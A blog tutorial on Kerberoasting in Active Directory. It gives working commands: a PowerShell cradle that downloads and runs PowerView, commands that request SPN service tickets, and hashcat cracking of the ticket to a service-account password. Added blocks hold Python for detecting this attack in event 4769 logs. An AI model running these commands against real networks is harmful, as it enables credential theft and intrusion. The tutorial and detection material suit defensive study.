Wednesday, August 28, 2019

Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques for attacking Active Directory environments. I recently learned more about Kerberoasting and how it is used to compromise user accounts within Active Directory. I'm going to walk through the step-by-step process: requesting a Kerberos service ticket (TGS) for the Service Principal Name (SPN) of a target service account, then cracking that ticket offline with hashcat to recover the service account's password (the ticket is encrypted with the account's NTLM hash). I also want to point out that this attack is carried out from an assumed-breach standpoint, meaning you already need access to a device that is authenticated to Active Directory for it to work.


Step 1. We are going to load the PowerView PowerShell script into memory with the following command:

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

Step 2. Once PowerView has been loaded into memory, run the following command to list the user accounts that have a Service Principal Name (SPN) set:

Get-DomainUser -SPN

Step 3. As you can see, the kobe_bryant user account has a Service Principal Name (SPN). We are now going to tell Kobe :) to go ahead and request a Kerberos service ticket for that SPN with the following command:

Get-DomainUser kobe_bryant | Get-DomainSPNTicket

Once the service ticket for the kobe_bryant SPN has been requested, the output of the Get-DomainSPNTicket command contains the ticket hash, which is encrypted with the NTLM hash of the kobe_bryant account. I copied that hash into my rawhash.txt file.
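On the domain controller, the request in Step 3 is recorded as Security event 4769 ("A Kerberos service ticket was requested"). What makes it stand out is the ticket encryption type: the ticket hashcat mode 13100 cracks is RC4-HMAC (etype 0x17), while a domain whose service accounts support AES issues 0x12 by default. The following detection logic is an added example and not part of the original post; the 4769 records it runs over are constructed sample data using the real 4769 field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status), and the account names, IP addresses and the burst threshold of three distinct services are assumptions for the example.

```python
from collections import defaultdict

# Constructed sample of Windows Security event 4769 records, flattened to one dict per
# event. Field names are the real 4769 EventData names; every value is made up.
SAMPLE_4769 = [
    {"TargetUserName": "jdoe@LAB.LOCAL",   "ServiceName": "kobe_bryant", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "jdoe@LAB.LOCAL",   "ServiceName": "svc_sql",     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "jdoe@LAB.LOCAL",   "ServiceName": "svc_http",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "jdoe@LAB.LOCAL",   "ServiceName": "WS01$",       "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "asmith@LAB.LOCAL", "ServiceName": "FILESRV01$",  "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.31", "Status": "0x0"},
    {"TargetUserName": "asmith@LAB.LOCAL", "ServiceName": "krbtgt",      "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.31", "Status": "0x0"},
    {"TargetUserName": "bjones@LAB.LOCAL", "ServiceName": "svc_sql",     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.40", "Status": "0x0"},
    {"TargetUserName": "bjones@LAB.LOCAL", "ServiceName": "svc_http",    "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.40", "Status": "0x1b"},
]

RC4_HMAC = 0x17          # Kerberos etype 23, the ticket type hashcat mode 13100 cracks
KERBEROS_SUCCESS = 0x0   # Status 0x0: the KDC actually issued the ticket


def is_roastable_request(ev: dict) -> bool:
    """True when a 4769 describes a ticket that could be cracked offline: RC4
    encryption, successfully issued, for a user account (computer accounts end
    with '$'), and not for krbtgt (those requests are TGT renewals, not service use)."""
    service = ev["ServiceName"]
    return (int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and int(ev["Status"], 16) == KERBEROS_SUCCESS
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def roastable_requests(events):
    """All events worth a look, in log order."""
    return [ev for ev in events if is_roastable_request(ev)]


def burst_requesters(events, min_distinct_services=3):
    """Map requester -> sorted distinct service accounts, keeping only requesters
    that obtained RC4 tickets for at least min_distinct_services different ones.
    A single RC4 ticket is a weak signal; one principal sweeping many SPNs is not."""
    seen = defaultdict(set)
    for ev in roastable_requests(events):
        seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in seen.items()
            if len(svcs) >= min_distinct_services}


if __name__ == "__main__":
    for ev in roastable_requests(SAMPLE_4769):
        print(f"RC4 service ticket: {ev['TargetUserName']} -> {ev['ServiceName']} from {ev['IpAddress']}")
    for user, svcs in burst_requesters(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {', '.join(svcs)}")
```

In the sample, the three RC4 tickets jdoe obtained for user-account SPNs are reported and jdoe is flagged as a burst requester, while the computer-account ticket, the krbtgt renewal, the AES tickets and the failed request are ignored. In a real environment, expect noise from legacy systems that still negotiate RC4; tuning the threshold per environment and setting AES-only encryption types on service accounts both shrink that noise, and the crack in Step 6 below only succeeds because the service account has a weak password.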

Step 4. Next I took the rawhash.txt output and converted it to hashcat format with the following command (the tr call removes the line wraps and spaces the console paste added, and the sed expression rewrites $krb5tgs$<account>:<hash> as the $krb5tgs$23$*<account>*$<hash> layout that hashcat mode 13100 expects):

cat rawhash.txt | tr -d '\r\n ' | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' > hash.txt
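The same conversion as the one-liner above, written out as a small Python parser so the two layouts are explicit and a malformed line fails loudly instead of producing a hash hashcat silently rejects. This is an added example, not code from the original post or from PowerView; it assumes the raw line has the $krb5tgs$<account>:<checksum>$<edata> layout the sed expression expects (the checksum being the first 32 hex characters), and the hash values in the test are constructed.

```python
import re

# PowerView's Get-DomainSPNTicket line as pasted into rawhash.txt:
#   $krb5tgs$<account>:<checksum, 32 hex>$<edata2, hex>
# hashcat mode 13100 layout:
#   $krb5tgs$23$*<account info>*$<checksum, 32 hex>$<edata2, hex>
RAW_LINE = re.compile(
    r"^\$krb5tgs\$(?P<account>[^:$]+):(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$")
HASHCAT_13100 = re.compile(
    r"^\$krb5tgs\$23\$\*[^*]*\*\$[0-9a-fA-F]{32}\$[0-9a-fA-F]+$")


def to_hashcat_13100(raw: str) -> str:
    """Rebuild one raw ticket line as a hashcat mode 13100 hash.
    All whitespace (including the line wraps a console paste adds) is dropped
    first, which is what the tr call in the shell one-liner does."""
    line = "".join(raw.split())
    m = RAW_LINE.match(line)
    if m is None:
        raise ValueError("line is not in $krb5tgs$<account>:<checksum>$<edata> format")
    return f"$krb5tgs$23$*{m['account']}*${m['checksum']}${m['edata']}"


def is_hashcat_13100(line: str) -> bool:
    """Sanity check before handing a file to hashcat -m 13100."""
    return HASHCAT_13100.match(line) is not None


def convert_file(src_path: str, dst_path: str) -> int:
    """Convert every hash in src_path and write one per line to dst_path.
    A raw file may hold a single hash wrapped over several lines, so the whole
    file is joined first and then split on the '$krb5tgs$' marker.
    Returns the number of hashes written."""
    with open(src_path) as f:
        text = "".join(f.read().split())
    chunks = [c for c in text.split("$krb5tgs$") if c]
    converted = [to_hashcat_13100("$krb5tgs$" + c) for c in chunks]
    with open(dst_path, "w") as f:
        f.write("\n".join(converted) + "\n")
    return len(converted)


if __name__ == "__main__":
    # Constructed demo line (not a real ticket): 32 'a's as checksum, 64 'b's as edata.
    demo = "$krb5tgs$kobe_bryant:" + "a" * 16 + "\n" + "a" * 16 + "$ " + "b" * 64
    print(to_hashcat_13100(demo))
```

Unlike the sed expression, the regex insists on a 32-character hex checksum followed by hex data, so a truncated paste or a line from a different PowerView output format raises ValueError rather than ending up in hash.txt.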

Step 5. After converting the hash into hashcat format, I ran hashcat against the hash.txt file with my rockyou.txt word list to crack the kobe_bryant hash:

sudo hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

Step 6. As you can see in the hashcat results, the password for the kobe_bryant account is P@$$W0rd. Now that we have the password, you can log in as kobe_bryant.

2 comments:

  1. This post is really nice and informative. The explanation given is really comprehensive and informative.

    mobile application penetration testing service

  2. This post will be very useful to us. I like your blog, and it is helpful to me. Nice thoughts for your great work.

    iso 27001 certification bodies in india
